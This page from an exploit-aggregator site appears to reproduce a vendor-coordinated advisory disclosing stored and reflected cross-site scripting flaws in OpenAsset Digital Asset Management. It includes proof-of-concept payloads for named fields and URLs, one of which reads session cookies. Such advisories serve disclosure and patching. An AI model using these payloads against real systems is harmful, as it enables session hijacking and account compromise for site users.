Advertisement






OpenAsset Digital Asset Management Cross Site Scripting

CVE Category Price Severity
CVE-2020-28857 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2020-12-14
CPE
cpe:cpe:/a:openasset:digital_asset_management
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 0.0210863 0.45068

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020120100

Below is a copy:

OpenAsset Digital Asset Management Cross Site Scripting
Title: Stored cross-site scripting (XSS)
Product: OpenAsset Digital Asset Management by OpenAsset
Vendor Homepage: https://www.openasset.com/
Vulnerable Version: 12.0.19 (Cloud) 11.2.1 (On-premise)
Fixed Version: 12.0.23 (Cloud) 11.4.10 (On-premise)
CVE Number: CVE-2020-28857

Author: Jack Misiura from The Missing Link 
Website: https://www.themissinglink.com.au


Timeline:
2020-11-14 Disclosed to Vendor
2020-12-04 Vendor releases final patches
2020-12-10 Publication

 

1. Vulnerability Description

The OpenAsset Digital Asset Management web application allowed for stored cross-site scripting attacks against various parameters and endpoints. Vulnerable parts of the web application include:

* System Preferences

              * Project Code regex field

              * User name regex field

              * Password regex field

              * All three description fields

              * First Album Name field

              * Visit Items Per SOAP request field

* Categories description

* Keywords, triggered on deletion attempts

* Editing photographer name

* Access token name

* Web share name

 

2. PoC

 

For system preferences fields, the following payloads can be used:

 

" autofocus onfocus="alert('Stored XSS');" abc="

"><script>alert("Script stored XSS");</script>

 

For categories description:

 

Category Name Goes Here<script>alert('Description stored XSS');</script>

 

For keywords:

 

Delete Me<script>alert(1234);</script>

 

Photographer name:

 

John Smith<script>alert("XSS Attack!");</script>

 

Access token name:

 

TokenName"><script>alert("Stored XSS Tokens")</script>

 

Web share name:

 

Share<script>alert("Stored XSS Web Share Name");</script>

 

3. Solution

 

The vendor provides an updated version (11.4.10) which should be installed immediately. If using the cloud version, the vendor has already updated it.

 

4. Advisory URL

 

https://www.themissinglink.com.au/security-advisories

 

--------

Title: Reflected cross-site scripting (XSS)
Product: OpenAsset Digital Asset Management by OpenAsset
Vendor Homepage: https://www.openasset.com/
Vulnerable Version: 12.0.19 (Cloud) 11.2.1 (On-premise)
Fixed Version: 12.0.22 (Cloud) 11.4.10 (On-premise)
CVE Number: CVE-2020-28859
 
Author: Jack Misiura from The Missing Link 
Website: https://www.themissinglink.com.au

Timeline:
2020-11-14 Disclosed to Vendor
2020-12-04 Vendor releases final patches
2020-12-10 Publication
 

1. Vulnerability Description

 

Multiple reflected cross-site scripting (XSS) vulnerabilities in the OpenAsset Digital Asset Management software allows remote attackers to inject arbitrary JavaScript or HTML via:

* Account recovery/password reset page through the email parameter

* Saved search request, through the id parameter

* Search result request, through both the imageViewId and lpFilterInputId parameters

 

2. PoC

 

Account recovery:

https://example.com/Page/StartAccountRecovery?ok=1 <https://example.com/Page/StartAccountRecovery?ok=1&email=test%40test%3cscript%3ealert(document.cookie)%3c%2Fscript%3e.com> &email=test%40test<script>alert(document.cookie)<%2Fscript>.com

 

Saved search request:

https://example.com/AJAXPage/SavedSearch?id=167826 <https://example.com/AJAXPage/SavedSearch?id=167826%22')%3b%7d%3b%7d%5d%7d)%3b%3c/script%3e%3cscript%3ealert(%22Reflected%20XSS!%22)%3b%3c/script> "')%3b}%3b}]})%3b</script><script>alert("Reflected%20XSS!")%3b</script>

"');}}}]});alert(123);

 

Search result request:

https://example.com/AJAXPage/SearchResults?imageViewId=A%27%22%3e%3cscript <https://example.com/AJAXPage/SearchResults?imageViewId=A%27%22%3e%3cscript%3ealert(%22more+xss+here%22)%3b%3c/script> >alert("more+xss+here")%3b</script>

 

3. Solution

 

The vendor provides an updated version (11.4.10) which should be installed immediately. If using the cloud version, the vendor has already updated it.

 

4. Advisory URL

 

https://www.themissinglink.com.au/security-advisories

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum